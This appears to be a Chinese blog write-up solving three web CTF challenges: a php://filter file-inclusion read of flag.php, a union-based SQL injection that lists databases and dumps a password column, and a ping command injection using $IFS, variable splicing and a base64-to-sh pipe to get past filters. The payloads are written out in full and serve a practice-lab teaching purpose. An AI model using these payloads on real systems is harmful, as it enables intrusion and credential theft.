本文详细介绍了三个CTF挑战的解决过程,包括文件包含漏洞利用、SQL注入攻击和命令注入。在SecretFile中,通过分析源码和使用php://filter伪协议获取flag。LoveSQL部分展示了如何通过SQL注入获取数据库信息,最终找到flag。而在PingPingPing中,利用bash命令注入的变种绕过限制获取flag。这些案例揭示了Web安全中常见的漏洞利用技巧。
[极客大挑战 2019]Secret File
你想知道密码吗,我不想知道,所以我打开了f12
发现有个事件,而这个事件后面就紧接着一串英文"oh you found me",那就没问题了,直接打开它,发现我们被跳转到了另外一个页面Archive_room.php
这个界面有个按钮secret,点进去他说里面没有东西,叫我回去仔细再看一下,而这里我观看Archive_room.php这个页面的源码的时候明显是点击secret按钮后跳转到action.php页面去的,但是他却直接跳转到了end.php,这说明在action.php页面存在代码将我们自动跳转到end.php,而且是时间很短的那种
所以为了在action.php这个页面停留,我采取了使用burp抓包的方式,将页面停留在action.php
抓包访问action.php页面他提示我们secr3t.php,那接下来就继续访问secr3t.php这个页面
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C9tXLP88-1639245874151)(C:/Users/86185/AppData/Roaming/Typora/typora-user-images/image-20211212004237722.png)]
然后他说flag放在了flag.php里面,那继续访问flag.php
说明这是最后一个页面了,剩下的就是利用某种方法来找到藏在这个页面的flag
首先我们要知道一个知识,就是php文件中可以写前端代码比如说HTML,这种一般是显示出来的,也有些php后端代码,而这个php代码默认是不会显示的,除非你用某种函数,而他提示说flag就在这个页面说明,flag就藏在php代码里面
现在来审计secr3t.php的代码
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
这里存在一个文件包含include函数,而其中的参数file变量是我们认为可以控制的,这里禁用掉了切换目录的../,tp字符,input伪协议,以及data伪协议,然后我们又要知道flag.php的完整源代码,就想到了php://filter伪协议进行当前目录下任意文件读取
所以构造出的payload如下
~secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
进行base64解码然后发现了flag
[极客大挑战 2019]LoveSQL
flag放在那个地方?先寻找注入点把
很显然可以注入,还是加上#号后正常回显,然后尝试使用order by爆出列名
1'order by 4%23 //回显Unknown column '4' in 'order clause'
1‘order by 3 %23 //回显正常
说明当前查询的表为三列
接下来使用union select看是否有回显点
有回显点,直接进行联合注入就行了
因为最开始他说他把flag放在了那个地方,所以我觉得很有必要将所有数据库的名字都注入一遍,防止flag不在当前数据库的情况
当前数据库名:
-1'union select 1,2,database()%23 //查出当前数据库为'geek'
所有数据库名:
-1'union select 1,2,group_concat(schema_name) from information_schema.schemata %23 //查出information_schema,mysql,performance_schema,test,geek,很显然还是我多虑了
geek数据库中的所有表:
-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23
//查出表为geekuser,l0ve1ysq1,以我的经验,flag必定在l0ve1ysq1里面
l0ve1ysq1表中所有字段:
-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23 //结果为id,username,password,那应该不是在password里面就是在另外一张表里面了
password列中的所有值:
-1'union select 1,2,group_concat(password) from geek.l0ve1ysq1%23
//结果wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{95322f13-6777-421d-a631-6505096ba78c}
这不是有了吗
[GXYCTF2019]Ping Ping Ping
一听题目感觉就跟ping相关,或者是rce
果然如此,他给出了个提示/?ip=,这很明显就是一个get传参,我们要上传一个ip的参数通过get的方式
然后构造payload
1;ls
返现网站根目录有flag.php,然后我访问它发现这个页面没有任何回显,那毫无疑问这个flag就藏在这个flag.php里面
1;cat flag.php
不能使用空格?然后我试着用%09(TAB键的URL编码)
fxck my symbol?看来数字也不能使用了,一般绕过空格的方法又一下
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、{cat,flag}等
其中$IFS不含数字,所以构造payload如下
1;cat$IFSflag
结果他又绕过了flag,然后我尝试了各种单引号,问号通配符都被过滤掉了,所以我就换一条思路,查看index.php的源码,看是否有什么
/?ip=
PING 1 (0.0.0.1): 56 data bytes
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
有了这串源码那就好办了,直接把正则匹配表达式放在网站上一解析
所以直接通过变量拼接的方式进行构造flag.php这一关键字,所以构造出的payload如下
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
- 当然也可以使用base64绕过,虽然bash被过滤掉了,但是linux还有sh可以用
/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
-
还有一种,我个人感觉是最简单的一种
1;cat$IFS$9`ls`
506
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
